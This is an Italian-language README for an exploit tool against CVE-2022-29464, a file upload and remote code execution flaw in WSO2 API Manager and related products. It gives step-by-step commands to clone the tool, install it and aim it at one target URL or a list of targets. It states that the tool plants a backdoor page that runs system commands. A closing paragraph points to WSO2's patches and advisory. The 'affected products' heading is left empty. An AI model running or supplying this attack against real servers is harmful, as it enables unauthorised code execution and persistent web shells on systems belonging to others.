
CVE-2022-29464 Exploit
La CVE-2022-29464 colpisce alcuni prodotti WSO2 come WSO2 API Manager e WSO2 Open Banking, consentendo il caricamento arbitrario di file e l'esecuzione remota di codice.
Prodotti interessati:
Avviso: solo per fini educativi.
Clona questo repository:
git clone https://github.com/Pasch0/WSO2RCE.git
cd WSO2RCE
pip install rich
Per avviare l'attacco, usa il comando -u per indicare un singolo URL come bersaglio oppure -f per un file con più bersagli:
python run.py -u https://alvo.com/

Accedendo alla backdoor tramite l'URL generato durante l'esecuzione dello script, è possibile interagire con il campo di testo inserendo comandi di sistema e ricevendo la risposta nella pagina.

WSO2 ha fornito mitigazioni temporanee ai clienti a gennaio 2022 e ha fornito le correzioni per tutte le versioni di prodotto supportate elencate nella Matrice di supporto WSO2 (stato "disponibile" e "obsoleto") a febbraio. Se sei un cliente WSO2 con un abbonamento al supporto, utilizza gli Aggiornamenti WSO2 per applicare la correzione.
Per maggiori dettagli, visita: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738